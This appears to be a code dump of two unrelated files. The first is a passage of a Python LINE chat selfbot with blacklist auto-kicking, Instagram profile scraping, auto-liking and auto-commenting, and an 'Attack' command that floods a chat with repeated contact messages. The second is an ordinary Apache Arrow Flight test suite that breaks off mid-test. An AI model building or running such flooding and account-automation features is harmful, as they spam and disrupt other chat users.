"**INSTAGRAM INFO USER**\n" details = "\n**INSTAGRAM INFO USER**" cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details) cl.sendImageWithURL(msg.to, text1[0]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif msg.text in ["Attack"]: msg.contentType = 13 msg.contentMetadata = {'mid': "u46a050ebcc66a90b47fae6256547cc53',"} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text.lower() == 'สุดหล่อ': msg.contentType = 13 msg.contentMetadata = {'mid': "u94a1bc387b927e86756334648d314f86',"} cl.sendMessage(msg) #================================= FINISHED =============================================# elif "Ban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Ban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: wait["blacklist"][target] = True cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban @" in msg.text: if msg.toType == 2: _name = msg.text.replace("Unban @","") _nametarget = _name.rstrip() gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,_nametarget + " Not Found") else: for target in targets: try: del wait["blacklist"][target] cl.sendText(msg.to,_nametarget + " Delete From Blacklist") except: cl.sendText(msg.to,_nametarget + " Not In Blacklist") elif "Ban:" in msg.text: nk0 = msg.text.replace("Ban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Succes Add to Blacklist") except: cl.sendText(msg.to,"Error") elif "Unban:" in msg.text: nk0 = msg.text.replace("Unban:","") nk1 = nk0.lstrip() nk2 = nk1.replace("","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: del wait["blacklist"][target] f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) cl.sendText(msg.to,_name + " Delete From Blacklist") except: cl.sendText(msg.to,_name + " Not In Blacklist") elif msg.text in ["ล้างดำ"]: wait["blacklist"] = {} cl.sendText(msg.to,"ล้างดำในรายการที่ถูกแบนเรียบร้อย") elif msg.text in ["Ban:on"]: wait["wblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Unban:on"]: wait["dblacklist"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Banlist"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Banlist") num=1 msgs="*Blacklist*" for mi_d in wait["blacklist"]: msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName) num=(num+1) msgs+="\n*Blacklist*\n\nTotal Blacklist : %i" % len(wait["blacklist"]) cl.sendText(msg.to, msgs) elif msg.text in ["Conban","Contactban","Contact ban"]: if wait["blacklist"] == {}: cl.sendText(msg.to,"Tidak Ada Blacklist") else: cl.sendText(msg.to,"Daftar Blacklist") h = "" for i in wait["blacklist"]: h = cl.getContact(i) M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': i} cl.sendMessage(M) elif msg.text in ["Midban","Mid ban"]: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) num=1 cocoa = "══════════List Blacklist═════════" for mm in matched_list: cocoa+="\n[%i] %s" % (num, mm) num=(num+1) cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list) cl.sendText(msg.to,cocoa) elif msg.text.lower() == 'scan blacklist': if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: cl.sendText(msg.to,"Tidak ada Daftar Blacklist") return for jj in matched_list: try: cl.kickoutFromGroup(msg.to,[jj]) print (msg.to,[jj]) except: pass #==============================================# if op.type == 17: if op.param2 not in Bots: if op.param2 in Bots: pass if wait["protect"] == True: if wait["blacklist"][op.param2] == True: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: try: cl.kickoutFromGroup(op.param1,[op.param2]) G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) except: pass if op.type == 19: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["protect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) cl.inviteIntoGroup(op.param1,[op.param2]) if op.type == 13: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.kickoutFromGroup(op.param1,[op.param2]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["cancelprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) if op.type == 11: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["linkprotect"] == True: wait ["blacklist"][op.param2] = True G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.updateGroup(G) cl.kickoutFromGroup(op.param1,[op.param2]) if op.type == 5: if wait["autoAdd"] == True: if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 11: if wait["linkprotect"] == True: if op.param2 not in Bots: G = cl.getGroup(op.param1) G.preventJoinByTicket = True cl.kickoutFromGroup(op.param1,[op.param3]) cl.updateGroup(G) # ----------------- NOTIFED MEMBER JOIN GROUP if op.type == 17: #if wait["sambut"] == True: if op.param2 in admin: return ginfo = cl.getGroup(op.param1) contact = cl.getContact(op.param2) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(op.param1," สวัสดี " + cl.getContact(op.param2).displayName + "\nยินดีต้อนรับเข้าร่วมกลุ่ม\n👉 " + str(ginfo.name) + " 👈" + "\nเข้ามาแล้วทำตัวดีๆน่ะ " +datetime.today().strftime('%H:%M:%S')) cl.sendImageWithURL(op.param1,image) print "ada orang masuk grup" if msg.contentType == 16: url = msg.contentMetadata["postEndUrl"] #------------------ KICK OUT FORM GROUP if op.type == 19: if op.param2 in Bots: return ginfo = cl.getGroup(op.param1) contact = cl.getContact(op.param2) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(op.param1,cl.getContact(op.param2).displayName + " มึงแกล้งน้องเค้าอีกแระบักปอบ") cl.sendImageWithURL(op.param1,image) print "MEMBER KICK OUT FORM GROUP" if op.type == 15: if op.param2 in Bots: return ginfo = cl.getGroup(op.param1) contact = cl.getContact(op.param2) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus random.choice(KAC).sendText(op.param1,"เฮ้ยๆ" + cl.getContact(op.param2).displayName + "จะรีบออกไปใหนแว้...😒😒") cl.sendImageWithURL(op.param1,image) print "MEMBER HAS LEFT THE GROUP" #------------------------------------------------------------------------------# if op.type == 59: print op except Exception as error: print error def autolike(): count = 1 while True: try: for posts in cl.activity(1)["result"]["posts"]: if posts["postInfo"]["liked"] is False: if wait["likeOn"] == True: cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001) print "Like" if wait["commentOn"] == True: if posts["userInfo"]["writerMid"] in wait["commentBlack"]: pass else: cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"]) except: count += 1 if(count == 50): sys.exit(0) else: pass thread2 = threading.Thread(target=autolike) thread2.daemon = True thread2.start() def likefriend(): for zx in range(0,200): hasil = cl.activity(limit=200) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001) print "Like" except: pass else: print "Already Liked On" time.sleep(0.60) def likeme(): for zx in range(0,200): hasil = cl.activity(limit=200) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: if hasil['result']['posts'][zx]['userInfo']['mid'] in mid: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002) print "Like" except: pass else: print "Status Sudah di Like On" while True: try: Ops = cl.fetchOps(cl.Poll.rev, 5) except EOFError: raise Exception("It might be wrong revision\n" + str(cl.Poll.rev)) for Op in Ops: if (Op.type != OpType.END_OF_OPERATION): cl.Poll.rev = max(cl.Poll.rev, Op.revision) bot(Op)
test_flight.py
# -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import base64 import contextlib import os import socket import struct import tempfile import threading import time import traceback import pytest import pyarrow as pa from pyarrow.compat import tobytes from pyarrow.util import pathlib try: from pyarrow import flight from pyarrow.flight import ( FlightServerBase, ServerAuthHandler, ClientAuthHandler ) except ImportError: flight = None FlightServerBase = object ServerAuthHandler, ClientAuthHandler = object, object # Marks all of the tests in this module # Ignore these with pytest ... -m 'not flight' pytestmark = pytest.mark.flight def test_import(): # So we see the ImportError somewhere import pyarrow.flight # noqa def resource_root(): """Get the path to the test resources directory.""" if not os.environ.get("ARROW_TEST_DATA"): raise RuntimeError("Test resources not found; set " "ARROW_TEST_DATA to <repo root>/testing") return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight" def read_flight_resource(path): """Get the contents of a test resource file.""" root = resource_root() if not root: return None try: with (root / path).open("rb") as f: return f.read() except FileNotFoundError: raise RuntimeError( "Test resource {} not found; did you initialize the " "test resource submodule?\n{}".format(root / path, traceback.format_exc())) def example_tls_certs(): """Get the paths to test TLS certificates.""" return { "root_cert": read_flight_resource("root-ca.pem"), "certificates": [ flight.CertKeyPair( cert=read_flight_resource("cert0.pem"), key=read_flight_resource("cert0.key"), ), flight.CertKeyPair( cert=read_flight_resource("cert1.pem"), key=read_flight_resource("cert1.key"), ), ] } def simple_ints_table(): data = [ pa.array([-10, -5, 0, 5, 10]) ] return pa.Table.from_arrays(data, names=['some_ints']) def simple_dicts_table(): dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8()) data = [ pa.chunked_array([ pa.DictionaryArray.from_arrays([1, 0, None], dict_values), pa.DictionaryArray.from_arrays([2, 1], dict_values)]), ] return pa.Table.from_arrays(data, names=['some_dicts']) class ConstantFlightServer(FlightServerBase): """A Flight server that always returns the same data. See ARROW-4796: this server implementation will segfault if Flight does not properly hold a reference to the Table object. """ def __init__(self): super(ConstantFlightServer, self).__init__() # Ticket -> Table self.table_factories = { b'ints': simple_ints_table, b'dicts': simple_dicts_table, } def do_get(self, context, ticket): # Return a fresh table, so that Flight is the only one keeping a # reference. table = self.table_factories[ticket.ticket]() return flight.RecordBatchStream(table) class MetadataFlightServer(FlightServerBase): """A Flight server that numbers incoming/outgoing data.""" def do_get(self, context, ticket): data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) return flight.GeneratorStream( table.schema, self.number_batches(table)) def do_put(self, context, descriptor, reader, writer): counter = 0 expected_data = [-10, -5, 0, 5, 10] while True: try: batch, buf = reader.read_chunk() assert batch.equals(pa.RecordBatch.from_arrays( [pa.array([expected_data[counter]])], ['a'] )) assert buf is not None client_counter, = struct.unpack('<i', buf.to_pybytes()) assert counter == client_counter writer.write(struct.pack('<i', counter)) counter += 1 except StopIteration: return @staticmethod def number_batches(table): for idx, batch in enumerate(table.to_batches()): buf = struct.pack('<i', idx) yield batch, buf class EchoFlightServer(FlightServerBase): """A Flight server that returns the last data uploaded.""" def __init__(self, expected_schema=None): super(EchoFlightServer, self).__init__() self.last_message = None self.expected_schema = expected_schema def do_get(self, context, ticket): return flight.RecordBatchStream(self.last_message) def do_put(self, context, descriptor, reader, writer): if self.expected_schema: assert self.expected_schema == reader.schema self.last_message = reader.read_all() class EchoStreamFlightServer(EchoFlightServer): """An echo server that streams individual record batches.""" def do_get(self, context, ticket): return flight.GeneratorStream( self.last_message.schema, self.last_message.to_batches(max_chunksize=1024)) def list_actions(self, context): return [] def do_action(self, context, action): if action.type == "who-am-i": return iter([flight.Result(context.peer_identity())]) raise NotImplementedError class GetInfoFlightServer(FlightServerBase): """A Flight server that tests GetFlightInfo.""" def get_flight_info(self, context, descriptor): return flight.FlightInfo( pa.schema([('a', pa.int32())]), descriptor, [ flight.FlightEndpoint(b'', ['grpc://test']), flight.FlightEndpoint( b'', [flight.Location.for_grpc_tcp('localhost', 5005)], ), ], -1, -1, ) def get_schema(self, context, descriptor): info = self.get_flight_info(context, descriptor) return flight.SchemaResult(info.schema) class ListActionsFlightServer(FlightServerBase): """A Flight server that tests ListActions.""" @classmethod def expected_actions(cls): return [ ("action-1", "description"), ("action-2", ""), flight.ActionType("action-3", "more detail"), ] def list_actions(self, context): for action in self.expected_actions(): yield action class ListActionsErrorFlightServer(FlightServerBase): """A Flight server that tests ListActions.""" def list_actions(self, context): yield ("action-1", "") yield "foo" class CheckTicketFlightServer(FlightServerBase): """A Flight server that compares the given ticket to an expected value.""" def __init__(self, expected_ticket): super(CheckTicketFlightServer, self).__init__() self.expected_ticket = expected_ticket def do_get(self, context, ticket): assert self.expected_ticket == ticket.ticket data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] table = pa.Table.from_arrays(data1, names=['a']) return flight.RecordBatchStream(table) def do_put(self, context, descriptor, reader): self.last_message = reader.read_all() class InvalidStreamFlightServer(FlightServerBase): """A Flight server that tries to return messages with differing schemas.""" schema = pa.schema([('a', pa.int32())]) def do_get(self, context, ticket): data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())] assert data1.type != data2.type table1 = pa.Table.from_arrays(data1, names=['a']) table2 = pa.Table.from_arrays(data2, names=['a']) assert table1.schema == self.schema return flight.GeneratorStream(self.schema, [table1, table2]) class SlowFlightServer(FlightServerBase): """A Flight server that delays its responses to test timeouts.""" def do_get(self, context, ticket): return flight.GeneratorStream(pa.schema([('a', pa.int32())]), self.slow_stream()) def do_action(self, context, action): time.sleep(0.5) return iter([]) @staticmethod def slow_stream(): data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] yield pa.Table.from_arrays(data1, names=['a']) # The second message should never get sent; the client should # cancel before we send this time.sleep(10) yield pa.Table.from_arrays(data1, names=['a']) class ErrorFlightServer(FlightServerBase): """A Flight server that uses all the Flight-specific errors.""" def do_action(self, context, action): if action.type == "internal": raise flight.FlightInternalError("foo") elif action.type == "timedout": raise flight.FlightTimedOutError("foo") elif action.type == "cancel": raise flight.FlightCancelledError("foo") elif action.type == "unauthenticated": raise flight.FlightUnauthenticatedError("foo") elif action.type == "unauthorized": raise flight.FlightUnauthorizedError("foo") raise NotImplementedError def list_flights(self, context, criteria): yield flight.FlightInfo( pa.schema([]), flight.FlightDescriptor.for_path('/foo'), [], -1, -1 ) raise flight.FlightInternalError("foo") class HttpBasicServerAuthHandler(ServerAuthHandler): """An example implementation of HTTP basic authentication.""" def __init__(self, creds): super(HttpBasicServerAuthHandler, self).__init__() self.creds = creds def authenticate(self, outgoing, incoming): buf = incoming.read() auth = flight.BasicAuth.deserialize(buf) if auth.username not in self.creds: raise flight.FlightUnauthenticatedError("unknown user") if self.creds[auth.username] != auth.password: raise flight.FlightUnauthenticatedError("wrong password") outgoing.write(tobytes(auth.username)) def is_valid(self, token): if not token: raise flight.FlightUnauthenticatedError("token not provided") if token not in self.creds: raise flight.FlightUnauthenticatedError("unknown user") return token class HttpBasicClientAuthHandler(ClientAuthHandler): """An example implementation of HTTP basic authentication.""" def __init__(self, username, password): super(HttpBasicClientAuthHandler, self).__init__() self.basic_auth = flight.BasicAuth(username, password) self.token = None def authenticate(self, outgoing, incoming): auth = self.basic_auth.serialize() outgoing.write(auth) self.token = incoming.read() def get_token(self): return self.token class TokenServerAuthHandler(ServerAuthHandler): """An example implementation of authentication via handshake.""" def __init__(self, creds): super(TokenServerAuthHandler, self).__init__() self.creds = creds def authenticate(self, outgoing, incoming): username = incoming.read() password = incoming.read() if username in self.creds and self.creds[username] == password: outgoing.write(base64.b64encode(b'secret:' + username)) else: raise flight.FlightUnauthenticatedError( "invalid username/password") def is_valid(self, token): token = base64.b64decode(token) if not token.startswith(b'secret:'): raise flight.FlightUnauthenticatedError("invalid token") return token[7:] class TokenClientAuthHandler(ClientAuthHandler): """An example implementation of authentication via handshake.""" def __init__(self, username, password): super(TokenClientAuthHandler, self).__init__() self.username = username self.password = password self.token = b'' def authenticate(self, outgoing, incoming): outgoing.write(self.username) outgoing.write(self.password) self.token = incoming.read() def get_token(self): return self.token @contextlib.contextmanager def flight_server(server_base, *args, **kwargs): """Spawn a Flight server on a free port, shutting it down when done.""" auth_handler = kwargs.pop('auth_handler', None) tls_certificates = kwargs.pop('tls_certificates', None) location = kwargs.pop('location', None) try_connect = kwargs.pop('try_connect', True) connect_args = kwargs.pop('connect_args', {}) if location is None: # Find a free port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) with contextlib.closing(sock) as sock: sock.bind(('', 0)) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) port = sock.getsockname()[1] ctor = flight.Location.for_grpc_tcp if tls_certificates: ctor = flight.Location.for_grpc_tls location = ctor("localhost", port) else: port = None ctor_kwargs = kwargs server_instance = server_base(*args, **ctor_kwargs) # The server instance needs to be initialized before shutdown() # can be called server_instance.init(location, auth_handler=auth_handler, tls_certificates=tls_certificates) def _server_thread(): server_instance.run() thread = threading.Thread(target=_server_thread, daemon=True) thread.start() # Wait for server to start if try_connect: deadline = time.time() + 5.0 client = flight.FlightClient.connect(location, **connect_args) while True: try: list(client.list_flights()) except Exception as e: if 'Connect Failed' in str(e): if time.time() < deadline: time.sleep(0.025) continue else: raise break try: yield location finally: server_instance.shutdown() thread.join(3.0) def test_flight_do_get_ints(): """Try a simple do_get call.""" table = simple_ints_table() with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'ints')).read_all() assert data.equals(table) @pytest.mark.pandas def test_do_get_ints_pandas(): """Try a simple do_get call.""" table = simple_ints_table() with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'ints')).read_pandas() assert list(data['some_ints']) == table.column(0).to_pylist() def test_flight_do_get_dicts(): table = simple_dicts_table() with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'dicts')).read_all() assert data.equals(table) def test_flight_do_get_ticket(): """Make sure Tickets get passed to the server.""" data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())] table = pa.Table.from_arrays(data1, names=['a']) with flight_server( CheckTicketFlightServer, expected_ticket=b'the-ticket', ) as server_location: client = flight.FlightClient.connect(server_location) data = client.do_get(flight.Ticket(b'the-ticket')).read_all() assert data.equals(table) def test_flight_get_info(): """Make sure FlightEndpoint accepts string and object URIs.""" with flight_server(GetInfoFlightServer) as server_location: client = flight.FlightClient.connect(server_location) info = client.get_flight_info(flight.FlightDescriptor.for_command(b'')) assert info.total_records == -1 assert info.total_bytes == -1 assert info.schema == pa.schema([('a', pa.int32())]) assert len(info.endpoints) == 2 assert len(info.endpoints[0].locations) == 1 assert info.endpoints[0].locations[0] == flight.Location('grpc://test') assert info.endpoints[1].locations[0] == \ flight.Location.for_grpc_tcp('localhost', 5005) def test_flight_get_schema(): """Make sure GetSchema returns correct schema.""" with flight_server(GetInfoFlightServer) as server_location: client = flight.FlightClient.connect(server_location) info = client.get_schema(flight.FlightDescriptor.for_command(b'')) assert info.schema == pa.schema([('a', pa.int32())]) def test_list_actions(): """Make sure the return type of ListActions is validated.""" # ARROW-6392 with flight_server(ListActionsErrorFlightServer) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(pa.ArrowException, match=".*unknown error.*"): list(client.list_actions()) with flight_server(ListActionsFlightServer) as server_location: client = flight.FlightClient.connect(server_location) assert list(client.list_actions()) == \ ListActionsFlightServer.expected_actions() @pytest.mark.skipif(os.name == 'nt', reason="Unix sockets can't be tested on Windows") def test_flight_domain_socket(): """Try a simple do_get call over a Unix domain socket.""" with tempfile.NamedTemporaryFile() as sock: sock.close() location = flight.Location.for_grpc_unix(sock.name) with flight_server(ConstantFlightServer, location=location) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'ints')) table = simple_ints_table() assert reader.schema.equals(table.schema) data = reader.read_all() assert data.equals(table) reader = client.do_get(flight.Ticket(b'dicts')) table = simple_dicts_table() assert reader.schema.equals(table.schema) data = reader.read_all() assert data.equals(table) @pytest.mark.slow def test_flight_large_message(): """Try sending/receiving a large message via Flight. See ARROW-4421: by default, gRPC won't allow us to send messages > 4MiB in size. """ data = pa.Table.from_arrays([ pa.array(range(0, 10 * 1024 * 1024)) ], names=['a']) with flight_server(EchoFlightServer, expected_schema=data.schema) as server_location: client = flight.FlightClient.connect(server_location) writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'), data.schema) # Write a single giant chunk writer.write_table(data, 10 * 1024 * 1024) writer.close() result = client.do_get(flight.Ticket(b'')).read_all() assert result.equals(data) def test_flight_generator_stream(): """Try downloading a flight of RecordBatches in a GeneratorStream.""" data = pa.Table.from_arrays([ pa.array(range(0, 10 * 1024)) ], names=['a']) with flight_server(EchoStreamFlightServer) as server_location: client = flight.FlightClient.connect(server_location) writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'), data.schema) writer.write_table(data) writer.close() result = client.do_get(flight.Ticket(b'')).read_all() assert result.equals(data) def test_flight_invalid_generator_stream(): """Try streaming data with mismatched schemas.""" with flight_server(InvalidStreamFlightServer) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(pa.ArrowException): client.do_get(flight.Ticket(b'')).read_all() def test_timeout_fires(): """Make sure timeouts fire on slow requests.""" # Do this in a separate thread so that if it fails, we don't hang # the entire test process with flight_server(SlowFlightServer) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("", b"") options = flight.FlightCallOptions(timeout=0.2) # gRPC error messages change based on version, so don't look # for a particular error with pytest.raises(flight.FlightTimedOutError): list(client.do_action(action, options=options)) def test_timeout_passes(): """Make sure timeouts do not fire on fast requests.""" with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) options = flight.FlightCallOptions(timeout=5.0) client.do_get(flight.Ticket(b'ints'), options=options).read_all() basic_auth_handler = HttpBasicServerAuthHandler(creds={ b"test": b"p4ssw0rd", }) token_auth_handler = TokenServerAuthHandler(creds={ b"test": b"p4ssw0rd", }) @pytest.mark.slow def test_http_basic_unauth(): """Test that auth fails when not authenticated.""" with flight_server(EchoStreamFlightServer, auth_handler=basic_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") with pytest.raises(flight.FlightUnauthenticatedError, match=".*unauthenticated.*"): list(client.do_action(action)) def test_http_basic_auth(): """Test a Python implementation of HTTP basic authentication.""" with flight_server(EchoStreamFlightServer, auth_handler=basic_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd')) identity = next(client.do_action(action)) assert identity.body.to_pybytes() == b'test' def test_http_basic_auth_invalid_password(): """Test that auth fails with the wrong password.""" with flight_server(EchoStreamFlightServer, auth_handler=basic_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") with pytest.raises(flight.FlightUnauthenticatedError, match=".*wrong password.*"): client.authenticate(HttpBasicClientAuthHandler('test', 'wrong')) next(client.do_action(action)) def test_token_auth(): """Test an auth mechanism that uses a handshake.""" with flight_server(EchoStreamFlightServer, auth_handler=token_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) action = flight.Action("who-am-i", b"") client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd')) identity = next(client.do_action(action)) assert identity.body.to_pybytes() == b'test' def test_token_auth_invalid(): """Test an auth mechanism that uses a handshake.""" with flight_server(EchoStreamFlightServer, auth_handler=token_auth_handler) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(flight.FlightUnauthenticatedError): client.authenticate(TokenClientAuthHandler('test', 'wrong')) def test_location_invalid(): """Test constructing invalid URIs.""" with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"): flight.FlightClient.connect("%") server = ConstantFlightServer() with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"): server.init("%") def test_location_unknown_scheme(): """Test creating locations for unknown schemes.""" assert flight.Location("s3://foo").uri == b"s3://foo" assert flight.Location("https://example.com/bar.parquet").uri == \ b"https://example.com/bar.parquet" @pytest.mark.slow @pytest.mark.requires_testing_data def test_tls_fails(): """Make sure clients cannot connect when cert verification fails.""" certs = example_tls_certs() with flight_server( ConstantFlightServer, tls_certificates=certs["certificates"], connect_args=dict(tls_root_certs=certs["root_cert"]), ) as server_location: # Ensure client doesn't connect when certificate verification # fails (this is a slow test since gRPC does retry a few times) client = flight.FlightClient.connect(server_location) # gRPC error messages change based on version, so don't look # for a particular error with pytest.raises(flight.FlightUnavailableError): client.do_get(flight.Ticket(b'ints')) @pytest.mark.requires_testing_data def test_tls_do_get(): """Try a simple do_get call over TLS.""" table = simple_ints_table() certs = example_tls_certs() with flight_server( ConstantFlightServer, tls_certificates=certs["certificates"], connect_args=dict(tls_root_certs=certs["root_cert"]), ) as server_location: client = flight.FlightClient.connect( server_location, tls_root_certs=certs["root_cert"]) data = client.do_get(flight.Ticket(b'ints')).read_all() assert data.equals(table) @pytest.mark.requires_testing_data def test_tls_override_hostname(): """Check that incorrectly overriding the hostname fails.""" certs = example_tls_certs() with flight_server( ConstantFlightServer, tls_certificates=certs["certificates"], connect_args=dict(tls_root_certs=certs["root_cert"]), ) as server_location: client = flight.FlightClient.connect( server_location, tls_root_certs=certs["root_cert"], override_hostname="fakehostname") with pytest.raises(flight.FlightUnavailableError): client.do_get(flight.Ticket(b'ints')) def test_flight_do_get_metadata(): """Try a simple do_get call with metadata.""" data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) batches = [] with flight_server(MetadataFlightServer) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'')) idx = 0 while True: try: batch, metadata = reader.read_chunk() batches.append(batch) server_idx, = struct.unpack('<i', metadata.to_pybytes()) assert idx == server_idx idx += 1 except StopIteration: break data = pa.Table.from_batches(batches) assert data.equals(table) def test_flight_do_put_metadata(): """Try a simple do_put call with metadata.""" data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) with flight_server(MetadataFlightServer) as server_location: client = flight.FlightClient.connect(server_location) writer, metadata_reader = client.do_put( flight.FlightDescriptor.for_path(''), table.schema) with writer: for idx, batch in enumerate(table.to_batches(max_chunksize=1)): metadata = struct.pack('<i', idx) writer.write_with_metadata(batch, metadata) buf = metadata_reader.read() assert buf is not None server_idx, = struct.unpack('<i', buf.to_pybytes()) assert idx == server_idx @pytest.mark.slow def test_cancel_do_get(): """Test canceling a DoGet operation on the client side.""" with flight_server(ConstantFlightServer) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'ints')) reader.cancel() with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"): reader.read_chunk() @pytest.mark.slow def test_cancel_do_get_threaded(): """Test canceling a DoGet operation from another thread.""" with flight_server(SlowFlightServer) as server_location: client = flight.FlightClient.connect(server_location) reader = client.do_get(flight.Ticket(b'ints')) read_first_message = threading.Event() stream_canceled = threading.Event() result_lock = threading.Lock() raised_proper_exception = threading.Event() def block_read(): reader.read_chunk() read_first_message.set() stream_canceled.wait(timeout=5) try: reader.read_chunk() except flight.FlightCancelledError: with result_lock: raised_proper_exception.set() thread = threading.Thread(target=block_read, daemon=True) thread.start() read_first_message.wait(timeout=5) reader.cancel() stream_canceled.set() thread.join(timeout=1) with result_lock: assert raised_proper_exception.is_set() def test_roundtrip_types(): """Make sure serializable types round-trip.""" ticket = flight.Ticket("foo") assert ticket == flight.Ticket.deserialize(ticket.serialize()) desc = flight.FlightDescriptor.for_command("test") assert desc == 